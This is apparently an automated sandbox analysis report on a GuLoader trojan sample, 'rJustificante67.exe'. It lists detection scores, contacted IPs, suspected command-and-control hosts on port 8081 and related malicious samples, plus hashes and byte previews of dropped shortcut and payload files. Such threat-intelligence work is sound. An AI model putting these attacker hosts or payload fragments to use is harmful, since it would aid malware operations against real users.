rJustificante67.exe	32%	ReversingLabs	Win32.Trojan.Guloader
rJustificante67.exe	24%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.185.78	true	false	high
drive.usercontent.google.com	216.58.212.129	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://aborters.duckdns.org:8081	rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	rJustificante67.exe, 00000006.00000002.2732658686.0000000002938000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	rJustificante67.exe, 00000006.00000002.2732658686.00000000029A1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.9.dr	false	high
http://checkip.dyndns.org	rJustificante67.exe, 00000006.00000002.2759965563.0000000032F2D000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000002.2759965563.0000000032F43000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	rJustificante67.exe, 00000006.00000002.2759965563.0000000032F43000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	rJustificante67.exe	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
142.250.185.78	drive.google.com	United States	15169	GOOGLEUS	false
216.58.212.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1617433
Start date and time:	2025-02-17 23:00:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rJustificante67.exe
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@4/22@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 66 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.107.246.45, 4.245.163.56, 40.126.31.128, 40.126.32.140
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rJustificante67.exe, PID 3428 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:02:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	pfYNBAkPIwsCPTS.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ORDER 3447743843.pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	E_DKONT.cmd	Get hash	malicious	DBatLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	000999374847565342.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	foreign.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	MAERSK Shipping Document - Bill of Lading - SWB Receipt - Packing List_PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	mMS2hfsyJd.img	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Nonmerchantable.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	PH9876509487650000.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	pfYNBAkPIwsCPTS.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JUSTIFICANTE DE TRANSFERENCIA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	SHIP INFORMATIONS.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	AWB_5771388044 Documenti di spedizione.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	JUSTIF. PAGO AQUISGRANpdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	mMS2hfsyJd.img	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Nonmerchantable.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	pfYNBAkPIwsCPTS.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JUSTIFICANTE DE TRANSFERENCIA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Hermaean.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	ORDER 3447743843.pdf.exe	Get hash	malicious	GuLoader	Browse	132.226.8.169
	24602711 OR Invoice.pdf.scr	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	QUOTATION_JANQUOTE312025#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	132.226.8.169
	E_DKONT.cmd	Get hash	malicious	DBatLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.W32.PossibleThreat.6050.24821.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 216.58.212.129
	SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 216.58.212.129
	SecuriteInfo.com.W32.PossibleThreat.6050.24821.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 216.58.212.129
	ZIOpctBE0o.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	142.250.185.78 216.58.212.129
	RFQ_SRC02252017-pdf.scr.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.212.129
	RFQ_SRC02252017-pdf.scr.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.212.129
	Nonmerchantable.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 216.58.212.129
	Payment_Swift Copy_ TXR077901844095342_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	142.250.185.78 216.58.212.129
	updater.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 216.58.212.129
	Request for Quotation TX00171164_pdf.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 216.58.212.129

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsc77E8.tmp\System.dll	kvk78zDZTu.exe	Get hash	malicious	GuLoader	Browse
	kvk78zDZTu.exe	Get hash	malicious	GuLoader	Browse
	RFQ- PO#0224-HANYOUNG Project REV03 -SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse
	RFQ- PO#0224-HANYOUNG Project REV03 -SUPPLY.com.exe	Get hash	malicious	GuLoader	Browse
	KEO-Order-3AY37A-APRIL_3103734_SUA721302_301824_01AU481924.exe	Get hash	malicious	GuLoader	Browse
	KEO-Order-3AY37A-APRIL_3103734_SUA721302_301824_01AU481924.exe	Get hash	malicious	GuLoader	Browse
	Lj4maSom2B.exe	Get hash	malicious	GuLoader	Browse
	Lj4maSom2B.exe	Get hash	malicious	GuLoader	Browse
	HW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exe	Get hash	malicious	GuLoader, PureLog Stealer, zgRAT	Browse
	HW#210872-218YAT-THEON-GLOBAL-Y801823-1AHEY361-APL38102823-19011.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Templates\dinosaurusserne.lnk

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1102
Entropy (8bit):	3.368966428470708
Encrypted:	false
SSDEEP:	12:8wl0/sXUd9CjXffJ1AM4YqicoRQ9mAYlficoRQ9yDQ1olfW+kjcmAwACBMmLIEAV:8gffJ1zqojlfoHcizZiACnLuRqy
MD5:	677CBBF36889BC6C42276B542F38F6BB
SHA1:	F7F14CEFDD485AE77E4A1E6C6D3EF5007BAD3E9E
SHA-256:	CFACB1F777A74082C6B5A3AEAC8A0E2E84484BD2240A405054AFB8732B1CA04E
SHA-512:	9A194DE2501ED99D31587DB420B9E6A51510C01208B76F91F42C563B7B4F5337C6F0F3E6F4E703BD816EC61FE8DCDD65F0BB2BE655D842078BF168FDB12253F0
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........Public..>............................................P.u.b.l.i.c.....Z.1...........Pictures..B............................................P.i.c.t.u.r.e.s.......2...........eksistensberettigelsen.pre..f............................................e.k.s.i.s.t.e.n.s.b.e.r.e.t.t.i.g.e.l.s.e.n...p.r.e...*...<.....\.....\.....\.....\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.i.c.t.u.r.e.s.\.e.k.s.i.s.t.e.n.s.b.e.r.e.t.t.i.g.e.l.s.e.n...p.r.e...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.p.r.e.m.i.e.r.m.i.n.i.s.t.e.r.\.r.a.a.s.t.o.f.i.n.d.v.i.n.d.i.n.g.e.r.\.p.u.l.p.i.t.i.c.a.l.\.F.u.r.c.i.f.o.r.m.\.U.l.i.g.e.v.g.t.e.n.........6...+...............i<A..O..\|.+...............1SPS.XF.L8C....&.m.q............/...S.-.1.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rJustificante67._c4df9bb712b3118345ad690a5b5e0fe30be12_b08b1bae_c9ad89c2-4d51-49d3-b650-e8fc15a3e926\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.221470335590497
Encrypted:	false
SSDEEP:	192:fbhdfZJT0BU/Ijuc3GNqmKzuiFQZ24IO83:9dfZJABU/Ij4qmKzuiFQY4IO83
MD5:	9DC9A46D805752AD703FBDE77A1D6DEF
SHA1:	832E0C6799807764B56FE6DF6AD07A8EC1FDFC45
SHA-256:	1063AE3D3ECA68047123E7FFD892790FCC7F4D6506343ADFD02DA5DFF92F9835
SHA-512:	386D790155FC17CA301C816DF03AE1A1758C196AEDBD5FC756C4E35BFB0497CB0D8D8A644E1A2F95C94C0A320723D48B34E2A0E9F102F56A266588A5F4F076AA
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.4.3.0.3.3.3.7.3.2.8.1.0.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.4.3.0.3.3.3.7.9.3.7.4.6.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.a.d.8.9.c.2.-.4.d.5.1.-.4.9.d.3.-.b.6.5.0.-.e.8.f.c.1.5.a.3.e.9.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.9.f.a.9.7.d.-.2.e.5.e.-.4.f.9.f.-.8.f.0.0.-.3.0.f.d.d.b.e.c.8.5.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.J.u.s.t.i.f.i.c.a.n.t.e.6.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.4.-.0.0.0.1.-.0.0.1.5.-.1.3.3.c.-.c.9.9.5.8.7.8.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.e.0.e.6.6.e.4.c.c.2.c.0.4.0.2.b.d.6.d.e.1.a.f.4.d.e.4.6.6.e.e.0.0.0.0.0.9.0.4.!.0.0.0.0.b.d.3.0.a.f.d.2.f.4.3.8.9.2.8.b.3.c.b.9.8.d.9.f.7.4.7.6.6.f.1.e.4.0.1.d.b.0.9.1.!.r.J.u.s.t.i.f.i.c.a.n.t.e.6.7...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4393.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Feb 17 22:02:17 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	286887
Entropy (8bit):	3.7546663402284453
Encrypted:	false
SSDEEP:	3072:5UQ4vfABf0roD0YDD4uEqmLTgl9dy5zIv/R:5Ivo50u06D4JTgXdy5zo
MD5:	0E7EAEEDE2A5BAF5B9C667B78896B5CF
SHA1:	92D29042F122245632D01E7DBCEE76FA24725EBE
SHA-256:	CD909D9950A5E669293BDCA817FA856B7185B00AF4C471C33DA00E0685E381C4
SHA-512:	4E9A54C67733CC57E52CF579392DB2510ECBAED06A909CF9619D7D5C2CA6E101912B527DCB6DBD2B6E3ECDC82F678145A8EEF8732AFD8C3C4F9044FA276C9574
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........g........................."..........T%...b..........T.......8...........T...........pc..7...........H,..........4...............................................................................eJ..............GenuineIntel............T.......d.....g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4549.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6352
Entropy (8bit):	3.7235325685889262
Encrypted:	false
SSDEEP:	192:R6l7wVeJMjz6Ir59Yz40pdKprr89bXcsf19m:R6lXJ2z6IrDYz40pdjXvf+
MD5:	B2B08F24B62AE4C6E5D770091D2E685A
SHA1:	4DA92B6EDC3272F01A7E643339CA0476D48F3C63
SHA-256:	E73DE31445FADCC62D559C01A9FEC66588D09E71D81BE8AE888EFB06BC81C003
SHA-512:	4AEA779736DD81CBD1A71A1CE226B6DC9F62988B6B33ABB09DFECD8C7D9FCC1A3E9B2C8398709BD8F07DE05EF4F44A606D92C45F67311B75A325BE2312508804
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER456A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4624
Entropy (8bit):	4.490221052047007
Encrypted:	false
SSDEEP:	48:cvIwWl8zsNJg77aI91PGJP9WpW8VYI5Ym8M4JPjFl+q8lKZZHtI1d:uIjfnI7DGBM7VAJzZTHtI1d
MD5:	D90DACCB6937071EEBAA62C840C48AB3
SHA1:	A57CA94470C90E4E507B8884EE361AFBAE9122F6
SHA-256:	1CD46B1D8648BA84F79D85727E470941359C0DF2AB378654543B5D9BE8B6AFF9
SHA-512:	34D2CFFE1CAA4E7705F864F12A4396DC1809CD96059A69DFDAFD29AC2E050674FA1BBF2E38DF4DA8BA0245F9594BBB8EE16B8FB34A85F6C1E80B0B52BE1FB613
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="725104" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\Public\Documents\stempelpudernes.lnk

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1110
Entropy (8bit):	3.2824532571854896
Encrypted:	false
SSDEEP:	12:8wl0Y0sXUd9CjXffJegKLkpNqgwOQ1olfW+kjcmAwACBMmLIEAZqvMNhvN4t2YZ2:80XffJwLhg6izZiACnLuRqy
MD5:	8EEE99D4A0B6C7993226489D1A375A18
SHA1:	F9D4D7C4A46957462875646B5FCBA07F4B5223F3
SHA-256:	9D5DE87C37D3996E898A85A4C6381E21D3F1EDBA42CA781DDA932327613BAF4F
SHA-512:	BED87F08ABCC321C48F1BB44B04B6796B85FFC7EE3243BB9C77DA186FB8F85E17D006DCCB30443C7FD8F6FE4F0492CCC7425349A382573C3BD5A0CB8925E4709
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........Public..>............................................P.u.b.l.i.c.....Z.1...........Pictures..B............................................P.i.c.t.u.r.e.s.....`.1...........muringerne..F............................................m.u.r.i.n.g.e.r.n.e.....h.2...........giggliest.pha.L............................................g.i.g.g.l.i.e.s.t...p.h.a.......$.....\.P.i.c.t.u.r.e.s.\.m.u.r.i.n.g.e.r.n.e.\.g.i.g.g.l.i.e.s.t...p.h.a...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.p.r.e.m.i.e.r.m.i.n.i.s.t.e.r.\.r.a.a.s.t.o.f.i.n.d.v.i.n.d.i.n.g.e.r.\.p.u.l.p.i.t.i.c.a.l.\.F.u.r.c.i.f.o.r.m.\.U.l.i.g.e.v.g.t.e.n.........6...+...............i<A..O..\|.+...............1SPS.XF.L8C....&.m.q............/.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Flushes.Des

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	data
Category:	dropped
Size (bytes):	221709
Entropy (8bit):	7.514998960878998
Encrypted:	false
SSDEEP:	6144:Ko2WIa8VSyNdF7kS7KRC3Gv+lex9PdU/s/FzZ:r25pNfzX3WKexQOV
MD5:	38F2E90E6DE74C553F8BBB38F0244D1B
SHA1:	6B1A084A6DC5B4A772F06F93C218652AC0720117
SHA-256:	EF2794CD7EEEC9BB828882B527870D78CC99905C0C9FDB84E3254780BC41E65A
SHA-512:	15BE278E1E27B2EAC96DA866452BA2CF327215D59D5F857B084B85D6268CE3B13DFFE8440D931445169BAE3516464707DC2B435E9F09D3D846F9420063B1879B
Malicious:	false
Reputation:	low
Preview:	....<<.............................B...E......XX.......7...........2....nn...m...............kkk...TT......................kk.........]]]]]........................>>>>................^^^....a....3.....mm.X..7.""...q....................................SS.......L.;;.............f....))......................jjjj..8888.....SS............i...+..........q.............rrr.........t.MM......(...QQQ.....VV....................................k............~...[.;..........R..........Z.......E.....222........GG.....\\\\.......QQQ.......======.....Z.`.........................e.w....(((...........................oo.......===...QQ.nnn.........[...........GGG....._...................Y.....''.................{{{{.....C.......................s...C........=...)......^............................t..MM..2...........L..9999................................v......Y.............L...................T...nn.j..............xx.........................HHHH.....V..........B.++.,....```............2....._.......>>>>>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Afguderiets150.txt

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	Generic INItialization configuration [incloses doughty]
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.702803069676154
Encrypted:	false
SSDEEP:	12:XgpLd7MRUs+VRKdHOdx/fzVH17PwhGxMXvChUmy:XZGs+VRKFixXztFpMfZ
MD5:	6E29BCEB9974EE689D56F5005BB7202D
SHA1:	6D5B9D63D6D719E2DFE25F4E6B297CA81E2F2FDC
SHA-256:	7007387B5476A98D8A424A65E192D3D9482F81A71C4A6F6A6514599B22815CBB
SHA-512:	D735445B88A04B231FA39280675F140F1146B458217DDF0639917C7DEEB0FF325D34FB17350CC20FC23764C58EDB53346EC06CAF814E496389419FA8AA0B5F49
Malicious:	false
Reputation:	low
Preview:	[SCHUH ENLACEMENT]..relandscaping bluffere sminkekrukkes mesopodial hydrographers tobenet premonitor aartiernes storting steppingstones diskrediteringers.Spillemesteren subcommissary velmagtstiden bromme ytterite tistykspakke karduserne trykimprgnerede gribefladens..;denumerantive frescoing caplet inkaminations timbers chiricahua.Heppendes jannys staldkarles autocondensation..[incloses doughty]..[ECCOPROTIC UNBRAN]..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Brudnes.Met2

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	443676
Entropy (8bit):	2.652018041102202
Encrypted:	false
SSDEEP:	3072:I1VJR8UkRwVYia11gYMVzXnneaxyGlgLy8HtjQ1X:I1VJR8UGCYn11gYMVTeey8gLy8HFQd
MD5:	33D4D1E2F52F64A73AB14A34F13ED21B
SHA1:	51EE59D65B136B6D841A39FCC5A694D16042EFA4
SHA-256:	3A5855ECF29D4B079886EC646D25E591E7F4F1F56899E11442260493E43DD7DD
SHA-512:	6445F1D16D58BC280912899688B3C6B20A1125E4E7FF5EB66A130FD2C5A1FC33A35BF5F6F6FA9E19E1B17148A5602BA4F7BAC33D22D1484897E097E649EB0558
Malicious:	false
Reputation:	low
Preview:	00E80020009F00A3A3A3A300000000000000001A1A0029002700000000D5D50000E60000006600A100006D0078000000020200242400D60039003131313100002B00080000007878009200007D0000890000A80044001B1B1B1B1B00000000CBCB00D400000000000000AB004D4D008900EF00010100000037373700A2A2005100EAEAEAEAEA006300C1C1005F00000005000B0B0B0000002F2F0000000000FB00E9E9008F8F00004F4F4F000032000000D40000003500D800000000EB000000E60000009900DF0000E3E300E10000002A2A00008A8A8A007500000000818181818100007C000000ABABAB00292900DF00535300005B001616160054540072720066660000330073730000000000008C8C8C0000E00000006F0000000000E3005252520033006A0000720000000000BD007373737373000C0C0C00000000000027270000B6B600EE002E2E00D00000002F000002000068680000310000292900E900707000474747007D7D7D7D0000000000CF0000A9A9A9007A7A7A7A00ABABABABAB000000414100B7B7B7009700000000D600757500969600B800EAEAEAEA002B2B00260000000000979797970065004E0000212100000000AC00670000000000000000000068680000000000540085000041000000525200000000760000003D3D00B6003A3A009090009000000000D8D8D8

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Catadicrotic.txt

Download File

Process:	C:\Users\user\Desktop\rJustificante67.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	418
Entropy (8bit):	4.6190663646477175
Encrypted:	false
